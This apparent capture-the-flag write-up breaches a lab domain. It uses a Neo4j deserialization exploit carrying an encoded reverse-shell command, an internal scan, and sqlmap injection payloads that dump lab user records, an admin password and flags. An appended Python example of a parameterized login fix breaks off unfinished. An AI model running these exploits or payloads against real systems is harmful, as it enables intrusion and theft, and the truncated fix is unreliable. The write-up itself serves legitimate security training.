
Time - 春秋云境


Target description:

Time is a medium-difficulty range environment. Completing the challenge helps players learn the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, deepens their understanding of the core authentication mechanism of a domain environment, and covers some interesting technical points of domain penetration. The range contains 4 flags, spread across different machines.

Internal address   Host or FQDN              Description
172.22.6.36        ubuntu                    Internet-facing Neo4j server
172.22.6.38        -                         Backend login page on port 80, vulnerable to SQL injection
172.22.6.25        WIN2019.xiaorang.lab      Domain member host
172.22.6.12        DC-PROGAME.xiaorang.lab   Domain controller

Neo4j Shell Server Deserialization

Kscan port scan:

     _   __
    /#| /#/
    |#|/#/   _____  _____     *     _   _
    |#.#/   /Edge/ /Forum|   /#\   |#\ |#\
    |##|   |#|____ |#|      /kv2\  |##\|#|
    |#.#\   \r0cky\|#|     /#/_\#\ |#.#.#|
    |#|\#\ /\___|#||#|____/#/###\#\|#|\##|
    \#| \#\\lcvvvv/ \aels/#/ v1.85#\#| \#/

Tips: 可以使用--spy 192,将会对192.168.0.1/16(B段)进行网关存活性探测
[+]2023/01/01 17:11:39 当前环境为:windows, 输出编码为:utf-8
[+]2023/01/01 17:11:39 成功加载HTTP指纹:[24758]条
[+]2023/01/01 17:11:39 成功加载NMAP探针:[150]个,指纹[11916]条
[*]2023/01/01 17:11:39 未检测到qqwry.dat,将关闭CDN检测功能,如需开启,请执行kscan --download-qqwry下载该文件
[+]2023/01/01 17:11:40 Domain、IP、Port、URL、Hydra引擎已准备就绪
[+]2023/01/01 17:11:40 所有扫描任务已下发完毕
ssh://xx.xx.xx.xx:22          ssh                        Length:41,Info:UbuntuLinux;protocol2,Version:8.2p1Ubuntu4ubuntu0.5,Port:22,Digest:SSH-2.0-OpenSSH_8.2p1Ub,ProductName:OpenSSH,OperatingSystem:Linux
waste://xx.xx.xx.xx:1337      response is empty          Port:1337,Length:0
[*]2023/01/01 17:12:00 当前存活协程数:Domain:0 个,IP:1 个,Port:68 个,URL:0 个,Hydra:0 个
http://xx.xx.xx.xx:7474                                  Digest:\"bolt\":\"bolt://47.9,Length:300,Port:7474
websocket://xx.xx.xx.xx:7687  websocket                  Port:7687,Digest:"HTTP/1.1400BadReques,Length:78,ProductName:Neo4jBoltprotocol
https://xx.xx.xx.xx:7473                                 Port:7473,Digest:b/manage/\",\n\"data\",Length:302
[+]2023/01/01 17:12:25 程序执行总时长为:[45.5836088s]
[+]2023/01/01 17:12:25 若有问题欢迎来我的Github提交Bug[https://github.com/lcvvvv/kscan/]

The scan reveals the Neo4j web management interface (port 7474) and the Neo4j Shell port (1337).

Exploit the Neo4j Shell Server deserialization vulnerability (CVE-2021-34371) to obtain a reverse shell:

.\jdk1.8.0_202\bin\java.exe -jar .\rhino_gadget.jar rmi://xx.xx.xx.xx:1337 "bash -c {echo,YzaCAiAvZGV2L...}|{base64,-d}|{bash,-i}"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
        java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
        java.io.IOException
[+] Exploit completed

With the shell obtained, read the flag:

neo4j@ubuntu:~$ cat flag01.txt
cat flag01.txt
 ██████████ ██
░░░░░██░░░ ░░
    ░██     ██ ██████████   █████
    ░██    ░██░░██░░██░░██ ██░░░██
    ░██    ░██ ░██ ░██ ░██░███████
    ░██    ░██ ░██ ░██ ░██░██░░░░
    ░██    ░██ ███ ░██ ░██░░██████
    ░░     ░░ ░░░  ░░  ░░  ░░░░░░


flag01: flag{dea03a84-275e-4f7b-b746-87f003da5f25}

Do you know the authentication process of Kerberos?
......This will be the key to your progress.

Privilege escalation on this host did not succeed, which makes the following steps slightly more cumbersome.

meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:16:3e:02:56:ff
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.22.6.36
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::216:3eff:fe02:56ff
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > execute -i -H -f /home/neo4j/fscan_amd64 -a "-h 172.22.6.36/24 -hn 172.22.6.36 -pa 3389 -time 10 -nobr"
Process 19610 created.
Channel 7 created.

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.25     is alive
(icmp) Target 172.22.6.38     is alive
[*] Icmp alive hosts len is: 3
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.12:88 open
172.22.6.12:3389 open
172.22.6.25:3389 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo:
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] NetInfo:
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] NetBios: 172.22.6.25     XIAORANG\WIN2019
[*] WebTitle: http://172.22.6.38        code:200 len:1531   title:后台登录
[*] NetBios: 172.22.6.12     [+]DC DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
已完成 11/11
[*] 扫描结束,耗时: 9.956606485s

Kerberos Domain User Enumeration

The backend login page at http://172.22.6.38 is vulnerable to SQL injection.

The HTTP request:

POST /index.php HTTP/1.1
Host: 172.22.6.38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://172.22.6.38
Connection: keep-alive
Referer: http://172.22.6.38/index.php
Upgrade-Insecure-Requests: 1

username=admin&password=admin123

Use sqlmap to dump all the data; this yields the domain user information as well as a flag:

PS C:\sqlmap> proxychains4 -q python3 .\sqlmap.py -r .\rawhttp.txt --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.12.11#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:18:55 /2023-05-18/

[11:18:55] [INFO] parsing HTTP request from '.\rawhttp.txt'
[11:18:56] [INFO] resuming back-end DBMS 'mysql'
[11:18:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8708 FROM (SELECT(SLEEP(5)))DqiW) AND 'VXIx'='VXIx&password=admin123

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x7a5465717643516c49676a724947674a526a77756c765161674a797677536d424c42536445464354,0x717a716b71),NULL-- -&password=admin123
---
[11:19:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[11:19:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[11:19:01] [INFO] fetching current database
[11:19:01] [INFO] fetching tables for database: 'oa_db'
[11:19:01] [INFO] fetching columns for table 'oa_users' in database 'oa_db'
[11:19:01] [INFO] fetching entries for table 'oa_users' in database 'oa_db'
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id  | email                      | phone       | username        |
+-----+----------------------------+-------------+-----------------+
[11:19:02] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 245 | chenyan@xiaorang.lab       | 18281528743 | CHEN YAN        |
| 246 | tanggui@xiaorang.lab       | 18060615547 | TANG GUI        |
| 247 | buning@xiaorang.lab        | 13046481392 | BU NING         |
| 248 | beishu@xiaorang.lab        | 18268508400 | BEI SHU         |
| 249 | shushi@xiaorang.lab        | 17770383196 | SHU SHI         |
| 250 | fuyi@xiaorang.lab          | 18902082658 | FU YI           |
| 251 | pangcheng@xiaorang.lab     | 18823789530 | PANG CHENG      |
| 252 | tonghao@xiaorang.lab       | 13370873526 | TONG HAO        |
| 253 | jiaoshan@xiaorang.lab      | 15375905173 | JIAO SHAN       |
| 254 | dulun@xiaorang.lab         | 13352331157 | DU LUN          |
| 255 | kejuan@xiaorang.lab        | 13222550481 | KE JUAN         |
| 256 | gexin@xiaorang.lab         | 18181553086 | GE XIN          |
| 257 | lugu@xiaorang.lab          | 18793883130 | LU GU           |
| 258 | guzaicheng@xiaorang.lab    | 15309377043 | GU ZAI CHENG    |
| 259 | feicai@xiaorang.lab        | 13077435367 | FEI CAI         |
| 260 | ranqun@xiaorang.lab        | 18239164662 | RAN QUN         |
| 261 | zhouyi@xiaorang.lab        | 13169264671 | ZHOU YI         |
| 262 | shishu@xiaorang.lab        | 18592890189 | SHI SHU         |
| 263 | yanyun@xiaorang.lab        | 15071085768 | YAN YUN         |
| 264 | chengqiu@xiaorang.lab      | 13370162980 | CHENG QIU       |
| 265 | louyou@xiaorang.lab        | 13593582379 | LOU YOU         |
| 266 | maqun@xiaorang.lab         | 15235945624 | MA QUN          |
| 267 | wenbiao@xiaorang.lab       | 13620643639 | WEN BIAO        |
| 268 | weishengshan@xiaorang.lab  | 18670502260 | WEI SHENG SHAN  |
| 269 | zhangxin@xiaorang.lab      | 15763185760 | ZHANG XIN       |
| 270 | chuyuan@xiaorang.lab       | 18420545268 | CHU YUAN        |
| 271 | wenliang@xiaorang.lab      | 13601678032 | WEN LIANG       |
| 272 | yulvxue@xiaorang.lab       | 18304374901 | YU LV XUE       |
| 273 | luyue@xiaorang.lab         | 18299785575 | LU YUE          |
| 274 | ganjian@xiaorang.lab       | 18906111021 | GAN JIAN        |
| 275 | pangzhen@xiaorang.lab      | 13479328562 | PANG ZHEN       |
| 276 | guohong@xiaorang.lab       | 18510220597 | GUO HONG        |
| 277 | lezhong@xiaorang.lab       | 15320909285 | LE ZHONG        |
| 278 | sheweiyue@xiaorang.lab     | 13736399596 | SHE WEI YUE     |
| 279 | dujian@xiaorang.lab        | 15058892639 | DU JIAN         |
| 280 | lidongjin@xiaorang.lab     | 18447207007 | LI DONG JIN     |
| 281 | hongqun@xiaorang.lab       | 15858462251 | HONG QUN        |
| 282 | yexing@xiaorang.lab        | 13719043564 | YE XING         |
| 283 | maoda@xiaorang.lab         | 13878840690 | MAO DA          |
| 284 | qiaomei@xiaorang.lab       | 13053207462 | QIAO MEI        |
| 285 | nongzhen@xiaorang.lab      | 15227699960 | NONG ZHEN       |
| 286 | dongshu@xiaorang.lab       | 15695562947 | DONG SHU        |
| 287 | zhuzhu@xiaorang.lab        | 13070163385 | ZHU ZHU         |
| 288 | jiyun@xiaorang.lab         | 13987332999 | JI YUN          |
| 289 | qiguanrou@xiaorang.lab     | 15605983582 | QI GUAN ROU     |
| 290 | yixue@xiaorang.lab         | 18451603140 | YI XUE          |
| 291 | chujun@xiaorang.lab        | 15854942459 | CHU JUN         |
| 292 | shenshan@xiaorang.lab      | 17712052191 | SHEN SHAN       |
| 293 | lefen@xiaorang.lab         | 13271196544 | LE FEN          |
| 294 | yubo@xiaorang.lab          | 13462202742 | YU BO           |
| 295 | helianrui@xiaorang.lab     | 15383000907 | HE LIAN RUI     |
| 296 | xuanqun@xiaorang.lab       | 18843916267 | XUAN QUN        |
| 297 | shangjun@xiaorang.lab      | 15162486698 | SHANG JUN       |
| 298 | huguang@xiaorang.lab       | 18100586324 | HU GUANG        |
| 299 | wansifu@xiaorang.lab       | 18494761349 | WAN SI FU       |
| 300 | fenghong@xiaorang.lab      | 13536727314 | FENG HONG       |
| 301 | wanyan@xiaorang.lab        | 17890844429 | WAN YAN         |
| 302 | diyan@xiaorang.lab         | 18534028047 | DI YAN          |
| 303 | xiangyu@xiaorang.lab       | 13834043047 | XIANG YU        |
| 304 | songyan@xiaorang.lab       | 15282433280 | SONG YAN        |
| 305 | fandi@xiaorang.lab         | 15846960039 | FAN DI          |
| 306 | xiangjuan@xiaorang.lab     | 18120327434 | XIANG JUAN      |
| 307 | beirui@xiaorang.lab        | 18908661803 | BEI RUI         |
| 308 | didi@xiaorang.lab          | 13413041463 | DI DI           |
| 309 | zhubin@xiaorang.lab        | 15909558554 | ZHU BIN         |
| 310 | lingchun@xiaorang.lab      | 13022790678 | LING CHUN       |
| 311 | zhenglu@xiaorang.lab       | 13248244873 | ZHENG LU        |
| 312 | xundi@xiaorang.lab         | 18358493414 | XUN DI          |
| 313 | wansishun@xiaorang.lab     | 18985028319 | WAN SI SHUN     |
| 314 | yezongyue@xiaorang.lab     | 13866302416 | YE ZONG YUE     |
| 315 | bianmei@xiaorang.lab       | 18540879992 | BIAN MEI        |
| 316 | shanshao@xiaorang.lab      | 18791488918 | SHAN SHAO       |
| 317 | zhenhui@xiaorang.lab       | 13736784817 | ZHEN HUI        |
| 318 | chengli@xiaorang.lab       | 15913267394 | CHENG LI        |
| 319 | yufen@xiaorang.lab         | 18432795588 | YU FEN          |
| 320 | jiyi@xiaorang.lab          | 13574211454 | JI YI           |
| 321 | panbao@xiaorang.lab        | 13675851303 | PAN BAO         |
| 322 | mennane@xiaorang.lab       | 15629706208 | MEN NAN E       |
| 323 | fengsi@xiaorang.lab        | 13333432577 | FENG SI         |
| 324 | mingyan@xiaorang.lab       | 18296909463 | MING YAN        |
| 325 | luoyou@xiaorang.lab        | 15759321415 | LUO YOU         |
| 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING |
| 327 | nongyan@xiaorang.lab       | 18097386975 | NONG YAN        |
| 328 | haolun@xiaorang.lab        | 15152700465 | HAO LUN         |
| 329 | oulun@xiaorang.lab         | 13402760696 | OU LUN          |
| 330 | weichipeng@xiaorang.lab    | 18057058937 | WEI CHI PENG    |
| 331 | qidiaofang@xiaorang.lab    | 18728297829 | QI DIAO FANG    |
| 332 | xuehe@xiaorang.lab         | 13398862169 | XUE HE          |
| 333 | chensi@xiaorang.lab        | 18030178713 | CHEN SI         |
| 334 | guihui@xiaorang.lab        | 17882514129 | GUI HUI         |
| 335 | fuyue@xiaorang.lab         | 18298436549 | FU YUE          |
| 336 | wangxing@xiaorang.lab      | 17763645267 | WANG XING       |
| 337 | zhengxiao@xiaorang.lab     | 18673968392 | ZHENG XIAO      |
| 338 | guhui@xiaorang.lab         | 15166711352 | GU HUI          |
| 339 | baoai@xiaorang.lab         | 15837430827 | BAO AI          |
| 340 | hangzhao@xiaorang.lab      | 13235488232 | HANG ZHAO       |
| 341 | xingye@xiaorang.lab        | 13367587521 | XING YE         |
| 342 | qianyi@xiaorang.lab        | 18657807767 | QIAN YI         |
| 343 | xionghong@xiaorang.lab     | 17725874584 | XIONG HONG      |
| 344 | zouqi@xiaorang.lab         | 15300430128 | ZOU QI          |
| 345 | rongbiao@xiaorang.lab      | 13034242682 | RONG BIAO       |
| 346 | gongxin@xiaorang.lab       | 15595839880 | GONG XIN        |
| 347 | luxing@xiaorang.lab        | 18318675030 | LU XING         |
| 348 | huayan@xiaorang.lab        | 13011805354 | HUA YAN         |
| 349 | duyue@xiaorang.lab         | 15515878208 | DU YUE          |
| 350 | xijun@xiaorang.lab         | 17871583183 | XI JUN          |
| 351 | daiqing@xiaorang.lab       | 18033226216 | DAI QING        |
| 352 | yingbiao@xiaorang.lab      | 18633421863 | YING BIAO       |
| 353 | hengteng@xiaorang.lab      | 15956780740 | HENG TENG       |
| 354 | changwu@xiaorang.lab       | 15251485251 | CHANG WU        |
| 355 | chengying@xiaorang.lab     | 18788248715 | CHENG YING      |
| 356 | luhong@xiaorang.lab        | 17766091079 | LU HONG         |
| 357 | tongxue@xiaorang.lab       | 18466102780 | TONG XUE        |
| 358 | xiangqian@xiaorang.lab     | 13279611385 | XIANG QIAN      |
| 359 | shaokang@xiaorang.lab      | 18042645434 | SHAO KANG       |
| 360 | nongzhu@xiaorang.lab       | 13934236634 | NONG ZHU        |
| 361 | haomei@xiaorang.lab        | 13406913218 | HAO MEI         |
| 362 | maoqing@xiaorang.lab       | 15713298425 | MAO QING        |
| 363 | xiai@xiaorang.lab          | 18148404789 | XI AI           |
| 364 | bihe@xiaorang.lab          | 13628593791 | BI HE           |
| 365 | gaoli@xiaorang.lab         | 15814408188 | GAO LI          |
| 366 | jianggong@xiaorang.lab     | 15951118926 | JIANG GONG      |
| 367 | pangning@xiaorang.lab      | 13443921700 | PANG NING       |
| 368 | ruishi@xiaorang.lab        | 15803112819 | RUI SHI         |
| 369 | wuhuan@xiaorang.lab        | 13646953078 | WU HUAN         |
| 370 | qiaode@xiaorang.lab        | 13543564200 | QIAO DE         |
| 371 | mayong@xiaorang.lab        | 15622971484 | MA YONG         |
| 372 | hangda@xiaorang.lab        | 15937701659 | HANG DA         |
| 373 | changlu@xiaorang.lab       | 13734991654 | CHANG LU        |
| 374 | liuyuan@xiaorang.lab       | 15862054540 | LIU YUAN        |
| 375 | chenggu@xiaorang.lab       | 15706685526 | CHENG GU        |
| 376 | shentuyun@xiaorang.lab     | 15816902379 | SHEN TU YUN     |
| 377 | zhuangsong@xiaorang.lab    | 17810274262 | ZHUANG SONG     |
| 378 | chushao@xiaorang.lab       | 18822001640 | CHU SHAO        |
| 379 | heli@xiaorang.lab          | 13701347081 | HE LI           |
| 380 | haoming@xiaorang.lab       | 15049615282 | HAO MING        |
| 381 | xieyi@xiaorang.lab         | 17840660107 | XIE YI          |
| 382 | shangjie@xiaorang.lab      | 15025010410 | SHANG JIE       |
| 383 | situxin@xiaorang.lab       | 18999728941 | SI TU XIN       |
| 384 | linxi@xiaorang.lab         | 18052976097 | LIN XI          |
| 385 | zoufu@xiaorang.lab         | 15264535633 | ZOU FU          |
| 386 | qianqing@xiaorang.lab      | 18668594658 | QIAN QING       |
| 387 | qiai@xiaorang.lab          | 18154690198 | QI AI           |
| 388 | ruilin@xiaorang.lab        | 13654483014 | RUI LIN         |
| 389 | luomeng@xiaorang.lab       | 15867095032 | LUO MENG        |
| 390 | huaren@xiaorang.lab        | 13307653720 | HUA REN         |
| 391 | yanyangmei@xiaorang.lab    | 15514015453 | YAN YANG MEI    |
| 392 | zuofen@xiaorang.lab        | 15937087078 | ZUO FEN         |
| 393 | manyuan@xiaorang.lab       | 18316106061 | MAN YUAN        |
| 394 | yuhui@xiaorang.lab         | 18058257228 | YU HUI          |
| 395 | sunli@xiaorang.lab         | 18233801124 | SUN LI          |
| 396 | guansixin@xiaorang.lab     | 13607387740 | GUAN SI XIN     |
| 397 | ruisong@xiaorang.lab       | 13306021674 | RUI SONG        |
| 398 | qiruo@xiaorang.lab         | 13257810331 | QI RUO          |
| 399 | jinyu@xiaorang.lab         | 18565922652 | JIN YU          |
| 400 | shoujuan@xiaorang.lab      | 18512174415 | SHOU JUAN       |
| 401 | yanqian@xiaorang.lab       | 13799789435 | YAN QIAN        |
| 402 | changyun@xiaorang.lab      | 18925015029 | CHANG YUN       |
| 403 | hualu@xiaorang.lab         | 13641470801 | HUA LU          |
| 404 | huanming@xiaorang.lab      | 15903282860 | HUAN MING       |
| 405 | baoshao@xiaorang.lab       | 13795275611 | BAO SHAO        |
| 406 | hongmei@xiaorang.lab       | 13243605925 | HONG MEI        |
| 407 | manyun@xiaorang.lab        | 13238107359 | MAN YUN         |
| 408 | changwan@xiaorang.lab      | 13642205622 | CHANG WAN       |
| 409 | wangyan@xiaorang.lab       | 13242486231 | WANG YAN        |
| 410 | shijian@xiaorang.lab       | 15515077573 | SHI JIAN        |
| 411 | ruibei@xiaorang.lab        | 18157706586 | RUI BEI         |
| 412 | jingshao@xiaorang.lab      | 18858376544 | JING SHAO       |
| 413 | jinzhi@xiaorang.lab        | 18902437082 | JIN ZHI         |
| 414 | yuhui@xiaorang.lab         | 15215599294 | YU HUI          |
| 415 | zangpeng@xiaorang.lab      | 18567574150 | ZANG PENG       |
| 416 | changyun@xiaorang.lab      | 15804640736 | CHANG YUN       |
| 417 | yetai@xiaorang.lab         | 13400150018 | YE TAI          |
| 418 | luoxue@xiaorang.lab        | 18962643265 | LUO XUE         |
| 419 | moqian@xiaorang.lab        | 18042706956 | MO QIAN         |
| 420 | xupeng@xiaorang.lab        | 15881934759 | XU PENG         |
| 421 | ruanyong@xiaorang.lab      | 15049703903 | RUAN YONG       |
| 422 | guliangxian@xiaorang.lab   | 18674282714 | GU LIANG XIAN   |
| 423 | yinbin@xiaorang.lab        | 15734030492 | YIN BIN         |
| 424 | huarui@xiaorang.lab        | 17699257041 | HUA RUI         |
| 425 | niuya@xiaorang.lab         | 13915041589 | NIU YA          |
| 426 | guwei@xiaorang.lab         | 13584571917 | GU WEI          |
| 427 | qinguan@xiaorang.lab       | 18427953434 | QIN GUAN        |
| 428 | yangdanhan@xiaorang.lab    | 15215900100 | YANG DAN HAN    |
| 429 | yingjun@xiaorang.lab       | 13383367818 | YING JUN        |
| 430 | weiwan@xiaorang.lab        | 13132069353 | WEI WAN         |
| 431 | sunduangu@xiaorang.lab     | 15737981701 | SUN DUAN GU     |
| 432 | sisiwu@xiaorang.lab        | 18021600640 | SI SI WU        |
| 433 | nongyan@xiaorang.lab       | 13312613990 | NONG YAN        |
| 434 | xuanlu@xiaorang.lab        | 13005748230 | XUAN LU         |
| 435 | yunzhong@xiaorang.lab      | 15326746780 | YUN ZHONG       |
| 436 | gengfei@xiaorang.lab       | 13905027813 | GENG FEI        |
| 437 | zizhuansong@xiaorang.lab   | 13159301262 | ZI ZHUAN SONG   |
| 438 | ganbailong@xiaorang.lab    | 18353612904 | GAN BAI LONG    |
| 439 | shenjiao@xiaorang.lab      | 15164719751 | SHEN JIAO       |
| 440 | zangyao@xiaorang.lab       | 18707028470 | ZANG YAO        |
| 441 | yangdanhe@xiaorang.lab     | 18684281105 | YANG DAN HE     |
| 442 | chengliang@xiaorang.lab    | 13314617161 | CHENG LIANG     |
| 443 | xudi@xiaorang.lab          | 18498838233 | XU DI           |
| 444 | wulun@xiaorang.lab         | 18350490780 | WU LUN          |
| 445 | yuling@xiaorang.lab        | 18835870616 | YU LING         |
| 446 | taoya@xiaorang.lab         | 18494928860 | TAO YA          |
| 447 | jinle@xiaorang.lab         | 15329208123 | JIN LE          |
| 448 | youchao@xiaorang.lab       | 13332964189 | YOU CHAO        |
| 449 | liangduanzhi@xiaorang.lab  | 15675237494 | LIANG DUAN ZHI  |
| 450 | jiagupiao@xiaorang.lab     | 17884962455 | JIA GU PIAO     |
| 451 | ganze@xiaorang.lab         | 17753508925 | GAN ZE          |
| 452 | jiangqing@xiaorang.lab     | 15802357200 | JIANG QING      |
| 453 | jinshan@xiaorang.lab       | 13831466303 | JIN SHAN        |
| 454 | zhengpubei@xiaorang.lab    | 13690156563 | ZHENG PU BEI    |
| 455 | cuicheng@xiaorang.lab      | 17641589842 | CUI CHENG       |
| 456 | qiyong@xiaorang.lab        | 13485427829 | QI YONG         |
| 457 | qizhu@xiaorang.lab         | 18838859844 | QI ZHU          |
| 458 | ganjian@xiaorang.lab       | 18092585003 | GAN JIAN        |
| 459 | yurui@xiaorang.lab         | 15764121637 | YU RUI          |
| 460 | feishu@xiaorang.lab        | 18471512248 | FEI SHU         |
| 461 | chenxin@xiaorang.lab       | 13906545512 | CHEN XIN        |
| 462 | shengzhe@xiaorang.lab      | 18936457394 | SHENG ZHE       |
| 463 | wohong@xiaorang.lab        | 18404022650 | WO HONG         |
| 464 | manzhi@xiaorang.lab        | 15973350408 | MAN ZHI         |
| 465 | xiangdong@xiaorang.lab     | 13233908989 | XIANG DONG      |
| 466 | weihui@xiaorang.lab        | 15035834945 | WEI HUI         |
| 467 | xingquan@xiaorang.lab      | 18304752969 | XING QUAN       |
| 468 | miaoshu@xiaorang.lab       | 15121570939 | MIAO SHU        |
| 469 | gongwan@xiaorang.lab       | 18233990398 | GONG WAN        |
| 470 | qijie@xiaorang.lab         | 15631483536 | QI JIE          |
| 471 | shaoting@xiaorang.lab      | 15971628914 | SHAO TING       |
| 472 | xiqi@xiaorang.lab          | 18938747522 | XI QI           |
| 473 | jinghong@xiaorang.lab      | 18168293686 | JING HONG       |
| 474 | qianyou@xiaorang.lab       | 18841322688 | QIAN YOU        |
| 475 | chuhua@xiaorang.lab        | 15819380754 | CHU HUA         |
| 476 | yanyue@xiaorang.lab        | 18702474361 | YAN YUE         |
| 477 | huangjia@xiaorang.lab      | 13006878166 | HUANG JIA       |
| 478 | zhouchun@xiaorang.lab      | 13545820679 | ZHOU CHUN       |
| 479 | jiyu@xiaorang.lab          | 18650881187 | JI YU           |
| 480 | wendong@xiaorang.lab       | 17815264093 | WEN DONG        |
| 481 | heyuan@xiaorang.lab        | 18710821773 | HE YUAN         |
| 482 | mazhen@xiaorang.lab        | 18698248638 | MA ZHEN         |
| 483 | shouchun@xiaorang.lab      | 15241369178 | SHOU CHUN       |
| 484 | liuzhe@xiaorang.lab        | 18530936084 | LIU ZHE         |
| 485 | fengbo@xiaorang.lab        | 15812110254 | FENG BO         |
| 486 | taigongyuan@xiaorang.lab   | 15943349034 | TAI GONG YUAN   |
| 487 | gesheng@xiaorang.lab       | 18278508909 | GE SHENG        |
| 488 | songming@xiaorang.lab      | 13220512663 | SONG MING       |
| 489 | yuwan@xiaorang.lab         | 15505678035 | YU WAN          |
| 490 | diaowei@xiaorang.lab       | 13052582975 | DIAO WEI        |
| 491 | youyi@xiaorang.lab         | 18036808394 | YOU YI          |
| 492 | rongxianyu@xiaorang.lab    | 18839918955 | RONG XIAN YU    |
| 493 | fuyi@xiaorang.lab          | 15632151678 | FU YI           |
| 494 | linli@xiaorang.lab         | 17883399275 | LIN LI          |
| 495 | weixue@xiaorang.lab        | 18672465853 | WEI XUE         |
| 496 | hejuan@xiaorang.lab        | 13256081102 | HE JUAN         |
| 497 | zuoqiutai@xiaorang.lab     | 18093001354 | ZUO QIU TAI     |
| 498 | siyi@xiaorang.lab          | 17873307773 | SI YI           |
| 499 | shenshan@xiaorang.lab      | 18397560369 | SHEN SHAN       |
| 500 | tongdong@xiaorang.lab      | 15177549595 | TONG DONG       |
+-----+----------------------------+-------------+-----------------+

[11:19:02] [INFO] table 'oa_db.oa_users' dumped to CSV file 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38\dump\oa_db\oa_users.csv'
[11:19:02] [INFO] fetching columns for table 'oa_f1Agggg' in database 'oa_db'
[11:19:02] [INFO] fetching entries for table 'oa_f1Agggg' in database 'oa_db'
Database: oa_db
Table: oa_f1Agggg
[1 entry]
+----+--------------------------------------------+
| id | flag02                                     |
+----+--------------------------------------------+
| 1  | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+

[11:19:02] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38\dump\oa_db\oa_f1Agggg.csv'
[11:19:02] [INFO] fetching columns for table 'oa_admin' in database 'oa_db'
[11:19:02] [INFO] fetching entries for table 'oa_admin' in database 'oa_db'
Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password         | username      |
+----+------------------+---------------+
| 1  | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+

[11:19:02] [INFO] table 'oa_db.oa_admin' dumped to CSV file 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38\dump\oa_db\oa_admin.csv'
[11:19:02] [INFO] fetched data logged to text files under 'C:\Users\test\AppData\Local\sqlmap\output\172.22.6.38'

[*] ending @ 11:19:02 /2023-05-18/
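As an added illustration (not code from the writeup or from the target application), the query shape behind a login form like this one next to its parameterized fix. It uses SQLite in place of MySQL and a constructed oa_admin table with the same three columns as the dump; the payload follows the three-column UNION form sqlmap reported, with sqlmap's CONCAT() column replaced by a plain string because SQLite has no CONCAT():

```python
import sqlite3


# Stand-in for the oa_admin table the writeup dumps: same three columns
# (id, password, username), but an invented password. SQLite is used so the
# example runs offline; the real target is MySQL behind index.php.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE oa_admin (id INTEGER PRIMARY KEY, password TEXT, username TEXT)"
    )
    conn.execute(
        "INSERT INTO oa_admin (password, username) VALUES (?, ?)",
        ("example-only-password", "administrator"),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern that makes the login form injectable: form fields are
    concatenated into the statement, so a quote in `username` ends the
    string literal and the rest of the input is parsed as SQL."""
    sql = (
        "SELECT id, password, username FROM oa_admin "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username, password):
    """Same query with bound parameters: the driver passes the values
    separately from the statement text, so input is never parsed as SQL."""
    sql = "SELECT id, password, username FROM oa_admin WHERE username=? AND password=?"
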